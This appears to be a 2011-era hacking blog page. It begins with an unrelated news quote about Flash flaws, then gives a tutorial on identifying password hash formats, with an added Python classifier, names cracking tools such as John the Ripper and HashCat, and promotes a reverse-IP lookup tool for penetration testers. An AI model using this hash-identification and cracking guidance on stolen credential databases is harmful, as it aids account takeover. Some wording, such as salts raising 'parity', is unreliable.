Flash vulnerabilities are an attractive target to hackers, said Andrew Storms, director of security operations at nCircle Security. When asked if the rash of Flash flaws meant it was time for companies to consider ditching the browser plug-in, Storms answered, "That's going to be incredibly hard due to the pervasiveness of its use in valid business systems."

A Brief Introduction to Hashes and Salts


What Is a Hash?


Ok, firstly, a lot of you still believe that hashes can be "reversed". This is a common misconception: hashes are generated by one-way cryptographic hash algorithms, which means the algorithm that created them CANNOT be reversed to determine the plaintext password.

These one-way functions are used so that computers do not have to store passwords in plaintext. Instead, when a password is entered (for example at a login screen), a one-way hash algorithm is applied to the supplied password and the hashed output is compared to the hash stored for that user. If the two hashes match, the passwords are the same and the user is authenticated; if the two hashes differ, the passwords do not match and the user is denied access.

Types Of Hashes And How To Identify Them

MD5 - The most common hash you will come across in the wild is an MD5 hash (Message-Digest algorithm).

These hashes are easily identified by the following factors:
- They are always 32 characters in length (128 bits)
- They are always hexadecimal (only the characters 0-9 and A-F are used)

Example - f5d1278e8109edd94e1e4197e04873b9

If the hash breaks one of these rules - IT IS NOT MD5.

SHA1 - Still used frequently on the internet; it is one of a large family of Secure Hash Algorithms.

These hashes are easily identified by the following factors:
- They are always 40 characters in length (160 bits)
- They are always hexadecimal (only the characters 0-9 and A-F are used)

Example - ab4d8d2a5f480a137067da17100271cd176607a1

If the hash breaks one of these rules - IT IS NOT SHA1.

MySQL < 4.1 - These aren't used very often, but they still come up frequently because people have no idea what to do with them. They are used in older versions of MySQL.

These hashes are easily identified by the following factors:
- They are always 16 characters in length (64 bits)
- They are always hexadecimal (only the characters 0-9 and A-F are used)

Example - 606727496645bcba

If the hash breaks one of these rules - IT IS NOT MYSQL < 4.1.

MYSQL5 - Used in newer versions of MySQL to store database user passwords.

These hashes are easily identified by the following factors:
- They are always 41 characters in length
- They are always upper-case
- They always begin with an asterisk

Example - *C8EB599B8E8EE7BE9F1A5691B7BC9ECCB8DE1C75

If the hash breaks one of these rules - IT IS NOT MYSQL5.

MD5(Wordpress) - Used in WordPress-driven sites; one of the hashes most commonly confused by everyone.

These hashes are easily identified by the following factors:
- They always start with $P$
- They are always mixed-case alphanumeric (0-9 A-Z a-z)
- They are always 34 characters long

Example - $P$9QGUsR07ob2qNMbmSCRh3Moi6ehJZR1

If the hash breaks one of these rules - IT IS NOT MD5(Wordpress).

MD5(phpBB3) - Used in phpBB forums; another commonly misidentified hash, especially amongst skids.

These hashes are easily identified by the following factors:
- They always start with $H$
- They are always mixed-case alphanumeric (0-9 A-Z a-z)
- They are always 34 characters long

Example - $H$9xAbu5SruQM5WvBldAnS46kQMEw2EQ0

If the hash breaks one of these rules - IT IS NOT MD5(PhpBB).


SALTS:

Ok, now there is A LOT of confusion around salts, so I'm going to try to quickly clear this up. The most commonly salted hash is MD5, because it is cryptographically weak and easy to crack. So a salt gets added to the password before hashing to increase the parity, for example MD5($password.$salt).

Salted MD5 - Used in a large number of applications to increase hash parity and to increase the time it takes to crack.

These hashes are easily identified by the following factors:
- They consist of two blocks connected by a colon; the first is the hash, the second is the salt.
- The first part of the salted hash is hexadecimal; the second is mixed-case alphanumeric.
- The first part will always be 32 characters long.
- The second part can be any length.

Example - 49adee90123f8c77d9020bba968c34dd:PS2en

If the hash breaks one of these rules - IT IS NOT A SALTED MD5.

Warning - in some cases the salt can contain symbols (but this is rare).

NOTE - You need both the salt AND the hash to crack a salted MD5.
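The identification rules above turned into code, as an added example that is not part of the original post, together with the MD5($password.$salt) construction stored in the hash:salt layout and the matching verification step. The function names are my own. It generalizes the page's rules in one place: the $P$ and $H$ (phpass) formats are accepted with the characters "." and "/" in addition to 0-9 A-Z a-z, because phpass's encoding alphabet includes them; the page's own examples still classify as stated.

```python
# Added example (not from the original post): hash-format identification by
# the length/alphabet rules above, plus salted-MD5 creation and verification.
import hashlib
import re
import secrets

# Each rule is (label, pattern the whole string must match), in the order the
# post lists them. Hex digests are accepted in either case.
HASH_FORMATS = [
    ("MD5",            re.compile(r"^[0-9a-f]{32}$", re.I)),
    ("SHA1",           re.compile(r"^[0-9a-f]{40}$", re.I)),
    ("MySQL < 4.1",    re.compile(r"^[0-9a-f]{16}$", re.I)),
    ("MySQL5",         re.compile(r"^\*[0-9A-F]{40}$")),        # 41 chars, upper-case
    ("MD5(Wordpress)", re.compile(r"^\$P\$[0-9A-Za-z./]{31}$")),  # 34 chars total
    ("MD5(phpBB3)",    re.compile(r"^\$H\$[0-9A-Za-z./]{31}$")),  # 34 chars total
    ("Salted MD5",     re.compile(r"^[0-9a-f]{32}:.+$", re.I)),   # hash:salt
]


def identify_hash(value):
    """Return the first format whose rules the string satisfies, else 'unknown'."""
    value = value.strip()
    for label, pattern in HASH_FORMATS:
        if pattern.match(value):
            return label
    return "unknown"


def salted_md5(password, salt=None):
    """MD5($password.$salt) stored as hash:salt. A fresh random salt is
    generated when none is supplied, so equal passwords get different hashes."""
    if salt is None:
        salt = secrets.token_hex(4)  # 8 alphanumeric characters
    digest = hashlib.md5((password + salt).encode()).hexdigest()
    return f"{digest}:{salt}"


def verify_salted_md5(password, stored):
    """Recompute MD5(password + salt) from the stored hash:salt and compare;
    this is why both halves are needed to check (or crack) the hash."""
    digest, _, salt = stored.partition(":")
    candidate = hashlib.md5((password + salt).encode()).hexdigest()
    return secrets.compare_digest(candidate, digest)


if __name__ == "__main__":
    for sample in ["f5d1278e8109edd94e1e4197e04873b9",
                   "*C8EB599B8E8EE7BE9F1A5691B7BC9ECCB8DE1C75",
                   "$P$9QGUsR07ob2qNMbmSCRh3Moi6ehJZR1",
                   "49adee90123f8c77d9020bba968c34dd:PS2en"]:
        print(f"{sample} -> {identify_hash(sample)}")
    stored = salted_md5("correct horse")  # constructed password
    print(stored, identify_hash(stored), verify_salted_md5("correct horse", stored))
```

Note that the rules only tell formats apart by shape: a 32-character hex string could equally be an MD4 or NTLM digest, so "looks like MD5" is a starting assumption, not a proof. The salt defeats precomputed tables, but because MD5 is fast it does little against a cracker that simply tries candidates; applications written today use a deliberately slow construction such as bcrypt, scrypt or PBKDF2 instead.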

How To Crack Hashes


MD5 - MD5 hashes are easily broken today due to the prevalence of online MD5 crackers such as www.hashchecker.de.
However, if you can't crack your hash online, you will need to use a tool such as John the Ripper or a more advanced hash cracker
such as Password Pro or HashCat.

Saturday 9 April 2011

Reverse Domain IP Lookup Tool:DRIL


DRIL (Domain Reverse IP Lookup) is a reverse domain tool that is really useful for penetration testers to find out which domain names are hosted on the target host. DRIL is a GUI, Java-based application that uses the Bing API key. DRIL has a simple, user-friendly interface that helps penetration testers do their work quickly without a mess.

There are online tools available, but many times, due to slow internet connectivity and other issues, we tend to get frustrated during audits. This tool is small and handy and will not consume hard-disk space, so it is simply a good and fast alternative.

Download DRIL v2.2 (DomainReverseIPLookup.jar) here.

Friday 8 April 2011

List of most useful online tools

Here is a list of some very useful and unique online tools for hackers and geeks :). Due to a busy schedule I am not able to post a description of every website; I will edit the information later.

If you like the post do share your views :)
SHARING IS CARING.